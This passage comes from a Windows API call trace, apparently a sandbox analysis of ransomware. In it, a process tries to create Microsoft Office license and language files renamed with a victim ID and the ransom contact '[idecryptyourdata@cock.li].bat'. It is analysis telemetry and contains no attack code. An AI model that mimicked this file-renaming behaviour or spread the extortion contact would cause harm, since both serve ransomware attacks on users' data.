dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.223] CloseHandle (hObject=0x528) returned 1 [0166.224] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.225] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.225] CloseHandle (hObject=0x528) returned 1 [0166.226] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.226] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.226] CloseHandle (hObject=0x528) returned 1 [0166.227] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.227] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.227] CloseHandle (hObject=0x528) returned 1 [0166.228] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.228] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.229] CloseHandle (hObject=0x528) returned 1 [0166.230] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.230] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.230] CloseHandle (hObject=0x528) returned 1 [0166.231] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.231] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.231] CloseHandle (hObject=0x528) returned 1 [0166.232] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.232] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.233] CloseHandle (hObject=0x528) returned 1 [0166.234] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.234] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.234] CloseHandle (hObject=0x528) returned 1 [0166.235] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.235] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.235] CloseHandle (hObject=0x528) returned 1 [0166.236] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.236] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.237] CloseHandle (hObject=0x528) returned 1 [0166.237] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.237] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail2-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail2-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.238] CloseHandle (hObject=0x528) returned 1 [0166.239] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.239] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.239] CloseHandle (hObject=0x528) returned 1 [0166.240] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.240] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.240] CloseHandle (hObject=0x528) returned 1 [0166.632] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.632] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmui.msi.16_accessmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.632] CloseHandle (hObject=0x4c4) returned 1 [0166.634] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.634] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.634] CloseHandle (hObject=0x4c4) returned 1 [0166.634] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.635] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\branding.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\branding.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.635] CloseHandle (hObject=0x4c4) returned 1 [0166.635] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.636] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.636] CloseHandle (hObject=0x4c4) returned 1 [0166.636] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.637] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.637] CloseHandle (hObject=0x4c4) returned 1 [0166.637] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.638] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\groovemui.msi.16_groovemui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.638] CloseHandle (hObject=0x4c4) returned 1 [0166.638] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.638] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\lyncmui.msi.16_lyncmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.639] CloseHandle (hObject=0x4c4) returned 1 [0166.641] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.641] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.641] CloseHandle (hObject=0x4c4) returned 1 [0166.642] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.643] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_AppXManifestLoc.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_appxmanifestloc.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.643] CloseHandle (hObject=0x4c4) returned 1 [0166.644] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.644] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.644] CloseHandle (hObject=0x4c4) returned 1 [0166.645] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.645] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_PostCommon.Office.MUI.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_postcommon.office.mui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.645] CloseHandle (hObject=0x4c4) returned 1 [0166.646] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.646] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemuiset.msi.16_officemuiset.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.646] CloseHandle (hObject=0x4c4) returned 1 [0166.647] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.647] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\onenotemui.msi.16_onenotemui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.647] CloseHandle (hObject=0x4c4) returned 1 [0166.648] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.648] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmmui.msi.16_osmmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.648] CloseHandle (hObject=0x4c4) returned 1 [0166.649] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.649] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\osmuxmui.msi.16_osmuxmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.650] CloseHandle (hObject=0x4c4) returned 1 [0166.650] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.650] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.651] CloseHandle (hObject=0x4c4) returned 1 [0166.651] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.652] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.652] CloseHandle (hObject=0x4c4) returned 1 [0166.653] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0166.653] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, 